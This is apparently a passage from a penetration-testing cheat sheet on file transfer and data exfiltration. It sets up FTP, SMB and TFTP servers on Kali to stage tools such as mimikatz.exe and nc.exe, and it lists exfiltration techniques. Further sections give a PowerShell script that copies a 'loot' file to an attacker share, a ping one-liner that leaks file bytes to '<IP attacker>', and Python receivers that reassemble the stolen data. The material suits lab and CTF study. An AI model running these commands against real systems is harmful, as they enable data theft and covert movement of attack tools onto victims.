#Run the following script to configure the FTP server (pure-ftpd with a PureDB virtual-user database)
#!/bin/bash
groupadd ftpgroup
# system account that will own the uploaded files: no home, no login shell
useradd -g ftpgroup -d /dev/null -s /usr/sbin/nologin ftpuser
mkdir -p /ftphome
# virtual FTP user "fusr" mapped onto the system account (pure-pw prompts for the password)
pure-pw useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
# enable PureDB authentication
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Windows client
#Works well with the python FTP server. With pure-ftpd use fusr:ftp instead of the anonymous login
#(-n disables auto-login so the USER/password lines in the script are used, -s feeds the commands)
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
SMB
Kali as server
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share the current directory as \\<kali_ip>\kali
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder under the share name "name"
#For new Win10 versions (unauthenticated guest access to SMB shares is blocked by default, so serve with credentials)
impacket-smbserver -smb2support -user test -password test test `pwd`
Or create an SMB share with samba:
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
Windows
Exfiltration
Techniques
Exfiltration Over C2 Channel: reuse the existing command and control channel to move data out.
Exfiltration Over Alternative Protocol: tunnel data over a protocol other than the C2 channel, such as DNS, ICMP, or HTTP.
Exfiltration Over Unencrypted Protocols: send data over cleartext protocols like FTP, Telnet, or HTTP (content is visible on the wire, so payload-based detection applies).
Exfiltration Over Encrypted Protocols: send data over HTTPS or SSH so that only metadata (destination, volume, timing) is left for detection.
Bypassing Egress Filtering: move data over a port or protocol the perimeter already allows outbound (DNS and HTTPS are the usual candidates) instead of one that is filtered.
Tools
Netcat: reads from and writes to raw TCP/UDP connections; the simplest file pipe.
PowerShell: task automation framework on Windows; Invoke-WebRequest, New-PSDrive and .NET sockets cover most transfer needs.
Certutil: certificate utility that can also fetch files (-urlcache) and base64 encode/decode them.
Bitsadmin: creates and manages Background Intelligent Transfer Service (BITS) transfer jobs, downloads and uploads alike.
FTP: File Transfer Protocol client, scriptable with -s as shown above.
Wget: command-line HTTP/FTP downloader.
Curl: transfers data to or from URLs over many protocols.
SMBClient: accesses SMB shares from Linux.
RDP: Remote Desktop Protocol; clipboard and drive redirection can carry files.
WMIC: command-line tool for Windows Management Instrumentation.
Reg: command-line utility for working with the registry (hive exports for offline credential extraction).
Schtasks: command-line tool for managing scheduled tasks.
Vssadmin: command-line tool for managing Volume Shadow Copies (used to copy locked files).
Wevtutil: command-line tool for managing event logs (export or clear).
Forfiles: command-line tool for batch-processing files by pattern and age.
Robocopy: robust recursive copy of files and directories, including to UNC paths.
Diskshadow: scriptable shadow copy management.
Net: command-line tool for managing network resources, including mapping shares with net use.
Tasklist: command-line tool for listing running processes.
Taskkill: command-line tool for terminating processes.
Regsvr32: command-line tool for registering and unregistering DLLs.
Regini: command-line tool for modifying registry permissions from a script.
Regsvcs: command-line tool for registering and unregistering .NET components.
#Windows client: run a binary straight from the Kali share, or map the share
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials (share "test", user test, password test)
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
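Added example (PowerShell, not from the original page): a credentialed copy of a local file onto the impacket share started above, followed by a hash comparison so a truncated transfer is noticed before the share is torn down. The server 10.10.14.14, share name test and user test / password test are taken from the commands above; the loot path is a placeholder.

```powershell
# Added example, not part of the original page. Assumes the impacket share from above:
# \\10.10.14.14\test with user test / password test. $Loot is a placeholder path.
$Server = "10.10.14.14"
$Share  = "test"
$Loot   = "C:\Users\Public\loot.zip"

# Build the credential without an interactive prompt (matches -user test -password test)
$Secure = ConvertTo-SecureString "test" -AsPlainText -Force
$Cred   = New-Object System.Management.Automation.PSCredential("test", $Secure)

# Map the share as a PSDrive for this session
New-PSDrive -Name exfil -PSProvider FileSystem -Root "\\$Server\$Share" -Credential $Cred | Out-Null

# Copy the file, then hash both copies so a short or corrupted write is caught
Copy-Item -Path $Loot -Destination "exfil:\" -ErrorAction Stop
$Local  = (Get-FileHash -Path $Loot -Algorithm SHA256).Hash
$Remote = (Get-FileHash -Path ("exfil:\" + (Split-Path $Loot -Leaf)) -Algorithm SHA256).Hash
if ($Local -ne $Remote) { throw "hash mismatch after copy: $Local != $Remote" }
Write-Host "copied $Loot -> \\$Server\$Share (SHA256 $Local)"

# Drop the mapping so no drive or credential reference lingers on the host
Remove-PSDrive -Name exfil
```

The same hash check is worth repeating on the Kali side with sha256sum; the impacket server logs the connecting user, so a mismatch between both ends points at the transfer rather than the source file.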
# To exfiltrate the content of a file via pings you can do (Linux sender: Windows ping has no -p):
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This sends 4 bytes per ping packet as the ICMP payload pattern (ping -p accepts up to 16 pattern bytes)
from scapy.all import *
#This is ippsec's receiver created for the HTB machine Mischief
def process_packet(pkt):
    if pkt.haslayer(ICMP):
        # type 0 = echo reply: the local kernel answers every request with the same payload,
        # so matching replies prints each chunk once instead of twice (request + reply)
        if pkt[ICMP].type == 0:
            data = pkt[ICMP].load[-4:] #Read the 4 interesting bytes (the pattern repeats through the 56-byte payload)
            print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)
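The following is an added example, not part of the original page or ippsec's script. It models the ping -p payload layout in pure Python (no scapy, so it runs offline) to show why pkt[ICMP].load[-4:] is correct for 4-byte chunks but not for every width up to 16, and how a receiver should slice the payload instead. The layout it assumes (pattern repeated from data offset 0, first 8 bytes overwritten by ping's timestamp, default 56 data bytes) is modelled on iputils ping on Linux; the secret bytes are constructed. On a real capture, call extract_chunk on pkt[ICMP].load inside the scapy handler above.

```python
# Added example (not from the original page): models `ping -p` payloads so the
# receiver slices the chunk out reliably for any width 1..16.
# Layout assumption (iputils ping on Linux): data[k] = pattern[k % len(pattern)],
# then the first TIMESTAMP_LEN bytes are overwritten by a struct timeval.

PING_DATA_LEN = 56        # default ICMP data size of Linux ping
TIMESTAMP_LEN = 8         # leading bytes ping clobbers with the send timestamp
MAX_PATTERN = 16          # `ping -p` parses at most 16 pattern bytes


def hex_chunks(data: bytes, width: int):
    """Mimic `xxd -p -c <width>`: one hex string per width bytes, last one may be shorter."""
    if not 1 <= width <= MAX_PATTERN:
        raise ValueError("ping -p takes between 1 and 16 pattern bytes")
    return [data[i:i + width].hex() for i in range(0, len(data), width)]


def ping_payload(pattern_hex: str, datalen: int = PING_DATA_LEN) -> bytes:
    """Build the ICMP data the way `ping -p <hex>` does under the assumed layout."""
    pat = bytes.fromhex(pattern_hex)
    data = bytearray(pat[k % len(pat)] for k in range(datalen))
    data[:TIMESTAMP_LEN] = b"\x00" * TIMESTAMP_LEN   # constructed stand-in for the timeval
    return bytes(data)


def chunk_offset(n: int) -> int:
    """Smallest multiple of n that is >= TIMESTAMP_LEN: a full, unrotated copy starts there."""
    return -(-TIMESTAMP_LEN // n) * n


def extract_chunk(payload: bytes, n: int) -> bytes:
    """Recover an n-byte chunk from one ping payload.
    payload[-n:] only works when datalen % n == 0 (true for 4, false for 16, where the
    last 16 bytes are a rotated copy); slicing at an aligned offset works for every n."""
    start = chunk_offset(n)
    if start + n > len(payload):
        raise ValueError("payload too short for this chunk width")
    return payload[start:start + n]


def send(secret: bytes, width: int):
    """Sender side: the payloads the xxd | ping loop would emit for `secret`."""
    return [ping_payload(h) for h in hex_chunks(secret, width)]


def receive(payloads, total_len: int, width: int) -> bytes:
    """Receiver side: reassemble from successive payloads. The total length must be
    known (send it in a first packet); the final chunk can be shorter than width and
    its pattern then repeats with its own period, so it is sliced with its own n."""
    out = bytearray()
    for payload in payloads:
        remaining = total_len - len(out)
        if remaining <= 0:
            break                          # ignore anything after the last chunk
        n = min(width, remaining)
        out += extract_chunk(payload, n)
    if len(out) != total_len:
        raise ValueError(f"short transfer: got {len(out)} of {total_len} bytes")
    return bytes(out)


if __name__ == "__main__":
    secret = b"admin:S3cret!\n"            # constructed sample, 14 bytes
    for width in (4, 16):
        got = receive(send(secret, width), len(secret), width)
        print(f"width {width:2d}: {'ok' if got == secret else 'MISMATCH'}")
```

The practical consequence: with xxd -p -c 16 the 4-byte receiver above must slice pkt[ICMP].load[16:32] rather than the tail, and the final short line from xxd needs the receiver to know how many bytes are still expected.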
SMTP
If you can send data to an SMTP server, you can create a debugging SMTP server with Python to receive it (the smtpd module exists in Python 2 and in Python 3 up to 3.11; it was removed in 3.12, where the aiosmtpd package provides the equivalent):
sudo python -m smtpd -n -c DebuggingServer :25
TFTP
Present by default on XP and 2003 (on other systems it has to be explicitly added during installation)
On Kali, start a TFTP server:
#I didn't get these options working and prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/to/nc.exe /tftp